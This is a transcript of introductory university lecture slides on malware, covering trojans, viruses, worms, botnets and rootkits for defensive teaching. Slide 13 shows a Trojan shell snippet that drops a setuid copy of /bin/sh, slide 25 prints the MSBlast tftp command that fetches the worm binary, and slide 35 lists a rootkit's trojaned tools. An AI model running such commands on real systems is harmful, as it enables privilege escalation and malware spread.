introduction to malware dan fleck cs469 security engineering reference: angelos stavrou’s isa564...
TRANSCRIPT
![Page 1: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/1.jpg)
Coming up: What is Malicious Software?
Introduction to MalwareDan FleckCS469 Security Engineering
Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop
111
![Page 2: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/2.jpg)
What is Malicious Software?
Malicious Software (a.k.a. Malware)• Software designed to infiltrate or damage a computer system,
without the owner's informed consent -- http://en.wikipedia.org/wiki/Malware
• Examples:• Viruses, worms, Trojan horses, spyware, and other malicious and
unwanted software
• How about adware?
• Malware references the intent of the creator, rather than any particular features • DRM v.s. Rootkit (e.g., Sony CD rootkit)
2Coming up: Why should we care?
Source: Symantec Internet Threat Report 2012
2
![Page 3: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/3.jpg)
Why should we care?
Source: Symantec Internet Threat Report 2012
3Coming up: Why should we care?
Source: Symantec Internet Threat Report 2012
3
![Page 4: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/4.jpg)
Why should we care?
Source: Symantec Internet Threat Report 2012
4Coming up: Why should we care?
Source: Symantec Internet Threat Report 2012
4
![Page 5: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/5.jpg)
Coming up: Taxonomy of Malicious Software
Why should we care?
Source: Symantec Internet Threat Report 2012
55
![Page 6: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/6.jpg)
Coming up: Trapdoor/Backdoor
Taxonomy of Malicious Software
66
![Page 7: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/7.jpg)
Coming up: Thompson's Compiler
Trapdoor/Backdoor
• Secret entry point into a system• Specific user identifier or password that
circumvents normal security procedures.• Commonly used by developers• Could be included in a compiler.
• Lets see Thompson’s Compiler
77
![Page 8: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/8.jpg)
Nov
embe
r 1, 2
004
Coming up: The Login Program
Slide #19-
8
Thompson's Compiler• Modify the compiler so that when it compiles
login , login accepts the user's correct password or a fixed password (the same one for all users)• Then modify the compiler again, so when it
compiles a new version of the compiler, the extra code to do the first step is automatically inserted• Recompile the compiler• Delete the source containing the modification
and put the undoctored source back
88
![Page 9: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/9.jpg)
Coming up: The Compiler
login source correct compiler login executable
user password
login source doctored compiler login executable
magic passworduser password or
logged in
logged in
The Login Program
9
![Page 10: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/10.jpg)
Nov
embe
r 1, 2
004
Coming up: Thompson’s Lesson
Slide #19-10
compiler source correct compiler compiler executable
login source
compiler source doctored compiler compiler executable
correct login executable
login source
rigged login executable
The Compiler
1010
![Page 11: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/11.jpg)
Coming up: Logic Bomb
Thompson’s Lesson
Verifying the source code isn’t always enough!
1111
![Page 12: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/12.jpg)
Coming up: Trojan Horse
Logic Bomb• Embedded in legitimate programs• Activated when specified conditions met• E.g., presence/absence of some file; Particular date/time or
particular user
• When triggered, typically damages system• Modify/delete files/disks
• Example: Disgruntled employee adds trigger that when employee’s salary record deleted from DB, all personnel records deleted also.
1212Can you think of other logic bombs?
![Page 13: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/13.jpg)
Coming up: Trojan Horse Example: NetBus
Trojan HorseProgram with an expected and hidden effect • Appears normal/expected • hidden effect violates
security policy
User tricked into executing Trojan horse • Expects (and sees) expected
behavior • Hidden effect performed
with user’s authorization
Attackercat >/homes/victim/ls <<eof cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* eof
Victimls 1313
![Page 14: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/14.jpg)
Coming up: Virus
Trojan Horse Example: NetBus
• Designed for Windows NT system• Victim uploads and installs this• Usually disguised as a game program, or in one
• Acts as a server, accepting and executing commands for remote administrator• This includes intercepting keystrokes and
mouse motions and sending them to attacker• Also allows attacker to upload, download files
1414
![Page 15: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/15.jpg)
Coming up: Early Virus Reports
Virus
• Program that inserts itself into one or more files and performs some action• Insertion phase is inserting itself into file• Execution phase is performing some (possibly null) action
• Self-replicating code• Generally tries to remain undetected
• Pseudocode If spread condition then
For target filesif not infected then alter to include virus
Perform malicious actionExecute normal program (step done only by Trojan horses to remain hidden)
141515
![Page 16: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/16.jpg)
Coming up: Virus Types
Early Virus Reports
• Brain (Pakistani) virus (1986)• Written for IBM PCs• Alters boot sectors of floppies, spreads to
other floppies
• MacMag Peace virus (1987)• Written for Macintosh• Prints “universal message of peace” on March
2, 1988 and deletes itself 1616
![Page 17: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/17.jpg)
Coming up: Virus Types
Virus TypesBoot Sector• Problem: How to ensure virus “carrier” executed?• Solution: Place in boot sector of disk• Run on any boot
• Propagate by altering boot disk creation• Less common with few boots off floppies
Executable• Malicious code placed at beginning of legitimate program (EXE or .COM• Runs when application run
15
Brain virus used this
1717
![Page 18: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/18.jpg)
Coming up: Macro Virus Example
Virus Types
Macro Virus• Infected “executable” isn’t machine code• Relies on something “executed” inside
application data• Common example: Macros
• Otherwise similar properties to other viruses• Architecture-independent• Application-dependent
161818
![Page 19: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/19.jpg)
Coming up: Virus Types
Macro Virus Example
• Melissa• Infected Microsoft Word 97 and Word 98 documents• Windows and Macintosh systems
• Invoked when program opens infected file• Installs itself as “open” macro and copies itself into
Normal template• This way, infects any files that are opened in future
• Invokes mail program, sends itself to everyone in user’s address book
1919
![Page 20: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/20.jpg)
Coming up: Virus Types
Virus TypesArmored• Encrypt virus• Prevents “signature” to detect virus
Stealth• Conceal Infection• Trap read and disinfect• Let execute call infected file
Terminate and Stay Resident (TSR)• Stays active in memory after application complete• Allows infection of previously unknown files• Trap calls that execute a program 17
• Request for file length: return length of uninfected file
• Request to open file: temporarily disinfect file, and reinfect on closing
• Request to load file for execution: load infected file
2020
![Page 21: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/21.jpg)
Coming up: Polymorphic Example
Virus TypesPolymorphic• A virus that changes its form each time it inserts itself into
another program
• Idea is to prevent signature detection by changing the “signature” or instructions used for deciphering routine
• At instruction level: substitute instructions
• At algorithm level: different algorithms to achieve the same purpose
• Toolkits to make these exist (Mutation Engine, Trident Polymorphic Engine)
172121
![Page 22: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/22.jpg)
Coming up: Worm
Polymorphic Example
• These are different instructions (with different bit patterns) but have the same effect:• add 0 to register• subtract 0 from register• xor 0 with register• no-op
• Polymorphic virus would pick randomly from among these instructions
2222
![Page 23: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/23.jpg)
Coming up: Work Propagation
Worm• Runs independently • Does not require a host program
• Propagates a fully working version of itself to other machines
• Carries a payload performing hidden tasks• Backdoors, spam relays, DDoS agents; …
• Phases• Probing Exploitation ReplicationPayload
1823So, how is a virus different from a worm?
23
![Page 24: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/24.jpg)
Coming up: MSBlast Worm (Aug 2003)
Work Propagation
192424
![Page 25: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/25.jpg)
Coming up: Zombie
MSBlast Worm (Aug 2003)1. Exploits target on port 135/TCP
3. Connects to target on port 4444/TCP
5. Creates “TFTP Server” on port 696. Sends “TFTP” command to shell
8. Sends “START msblast.exe” command
10. Closes connection
2. Binds svchost.exe to port 4444/TCP via injected code
4. Creates shell “cmd.exe” and binds it to port 4444/TCP
Runs TFTP command: teleports msblast.exe file
9. Runs worm on target
11. Shell closes
tftp –l 192.168.0.1 GET msblast.exe
TCP protocal: Direction: InboundLocal end point ports: 135Application: ANYRemote End Point: ANY/ANYRule valid: ALWAYSAction: DENY
Infected New Victim
202525
![Page 26: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/26.jpg)
Coming up: Zombie
Zombie• Secretly takes over another networked computer by exploiting
software flows• Builds the compromised computers into a zombie network or
botnet• Uses it to indirectly launch attacks• E.g., DDoS
2126
Lets see how we create zombies..
26
![Page 27: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/27.jpg)
Coming up: Zombie: Steps - 1
Lets see how we create zombies..
Computer27
![Page 28: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/28.jpg)
Coming up: Zombie: Steps - 2
Zombie: Steps - 1
Attacker
Unsecured Computers
Attacker scans Internet for unsecured systems that can be compromised
1
222728
![Page 29: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/29.jpg)
Coming up: Zombie: Steps - 3
Zombie: Steps - 2
Attacker
Unsecured Computers
Attacker secretly installs zombie agentprogram, turning unsecured computers into zombies
2
232829
![Page 30: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/30.jpg)
Coming up: Zombie: Steps - 4
Zombie: Steps - 3
Attacker
Zombies
Zombie agents “phone home” and connect to a master server
3
Master Server 242930
![Page 31: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/31.jpg)
Coming up: Zombie: Steps - 5
Zombie: Steps - 4
Attacker
Zombies
Attacker sends commands to Maser Server to launch a DDoS attack against a targeted system
4
Master Server 253031
![Page 32: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/32.jpg)
Coming up: Zombie: Steps - 6
Zombie: Steps - 5
Attacker
Zombies
Master server sends signal to zombies to launch attack on targeted system
5
Master Server
TARGET
263132
![Page 33: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/33.jpg)
Coming up: Rootkit
Zombie: Steps - 6
Attacker
Zombies
Target system is overwhelmed by zombie requests denying requests from normal users
6
Master Server
TARGET
User
Requ
est
Den
ied
273233
![Page 34: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/34.jpg)
Coming up: Linux RootKit III
Rootkit
• “A rootkit is a set of programs and code that allows a permanent or consistent, undetectable presence on a computer”
• Goals:• Hide malicious resources (e.g., processes, files,
registry keys, open ports, etc.)• Provide hidden backdoor access
283334
![Page 35: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/35.jpg)
Coming up: Rootkit
ls Trojaned! Hide filesdu Trojaned! Hide filesifconfig Trojaned! Hide sniffingnetstat Trojaned! Hide connectionschfn Trojaned! User->r00tchsh Trojaned! User->r00tinetd Trojaned! Remote accesslogin Trojaned! Remote accesspasswd Trojaned! User->r00tps Trojaned! Hide processestop Trojaned! Hide processesrshd Trojaned! Remote accesssyslogd Trojaned! Hide logslinsniffer Packet sniffer!fix File fixer!z2 Zap2 utmp/wtmp/lastlog eraser!wted wtmp/utmp editor!lled lastlog editor!bindshell port/shell type daemon!tcpd Trojaned! Hide connections, avoid denies
Linux RootKit III
293435
![Page 36: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/36.jpg)
Coming up: Rootkit Classification
Rootkit
• Simple rootkits:• Modify user programs (ls, ps)• Detectable by tools like Tripwire
• Sophisticated rootkits:• Modify the kernel itself• Hard to detect from userland
303536
![Page 37: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/37.jpg)
Coming up: Rootkit Classification
Rootkit Classification
31Replace apps Add code to all apps
See: http://www.phrack.org/issu
es.html?issue=62&id=12
Replace/modify kernel modules
3637
![Page 38: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/38.jpg)
Coming up: Lessons
Rootkit Classification
32
Run entire OS in a virtual machine
3738
![Page 39: Introduction to Malware Dan Fleck CS469 Security Engineering Reference: Angelos Stavrou’s ISA564 and Computer Security by Bishop Coming up: What is Malicious](https://reader035.vdocuments.site/reader035/viewer/2022062515/56649d0f5503460f949e4a4e/html5/thumbnails/39.jpg)
End of presentation
Lessons• Malware comes in many types and styles
• It’s not going away and will always hit new platforms as they come out
• We’ll need multiple approaches to defend against them.
38Next up: Malware Defense!
3839